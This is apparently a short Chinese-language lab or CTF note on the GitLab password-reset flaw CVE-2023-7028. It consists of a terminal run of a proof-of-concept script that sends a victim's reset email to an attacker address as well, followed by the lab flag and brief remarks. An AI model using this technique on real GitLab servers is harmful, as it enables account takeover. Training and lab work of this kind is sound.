git_cve_23_7028v1.5

教学关

┌──(root㉿kali)-[~/poc/CVE/2023-7028]
└─# p4 python poc.py -u http://10.10.24.8:8000 -t victim@mail.gitlab.thm -e attacker@mail.gitlab.thm
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/aarch64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[DEBUG] Getting authenticity_token ...
[proxychains] Strict chain  ...  120.46.78.45:7777  ...  10.10.24.8:8000  ...  OK
[DEBUG] authenticity_token = Pz24wEXlGsshAPFmSG8dISVYFJW2SXNGi-OMzksGkeJtelkYyGAdAYuEKrL-3GM6DKUlxeUcmgEkdCJNpup9Kg
[DEBUG] Sending reset password request
[proxychains] Strict chain  ...  120.46.78.45:7777  ...  10.10.24.8:8000  ...  OK
[DEBUG] Emails sent to victim@mail.gitlab.thm and attacker@mail.gitlab.thm !
Flag value: account_hack#d

感觉和在国光那个看到的,电话拼接的差不多
这里是用token但是发的自己邮箱